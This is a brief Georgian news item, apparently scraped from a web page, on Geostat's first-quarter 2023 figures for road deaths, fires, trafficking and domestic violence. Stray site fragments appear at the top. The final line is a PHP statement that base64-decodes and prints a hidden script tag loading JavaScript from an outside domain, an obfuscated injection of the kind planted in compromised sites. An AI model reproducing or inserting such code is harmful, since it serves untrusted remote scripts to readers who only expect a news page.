celsiusi
ავერსი საქკაბელი

სტატისტიკის ეროვნული სამსახურის 2023 წლის პირველი კვარტლის მონაცემებით, საქართველოში ავტოსაგზაო შემთხვევებს 93 ადამიანი ემსხვერპლა. საანგარიშო პერიოდში სულ, ქვეყანაში 1 153 ავტოსაგზაო შემთხვევა მოხდა. აქედან, 48 შემთხვევა სიმთვრალით იყო გამოწვეული, დაზარალდა 1 480 ადამიანი.

 

ამასთან, საქსტატის ინფორმაციით, 2023 წლის პირველ კვარტალში ქვეყანაში 3 254 ხანძარი დაფიქსირდა, რის შედეგადაც დაიღუპა 21 ადამიანი, ხოლო ტრავმა მიიღო 63-მა. ხანძრების შედეგად, ქვეყნის მასშტაბით 135 შენობა-ნაგებობა განადგურდა.

 

საქსტატის ცნობით, მიმდინარე წლის პირველ კვარტალში ტრეფიკინგის მუხლით ჩადენილია სამი დანაშაული და შსს-ს მიერ ჯერ-ჯერობით არც ერთი საქმეა გახსნილი.

 

რაც შეეხება ოჯახში ძალადობას, 2023 წლის პირველ კვარტალში ოჯახში ძალადობის მსხვერპლთა რაოდენობამ 2 195 შეადგინა. აქედან 1 820 ქალია, ხოლო 375 მამაკაცი.

243
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");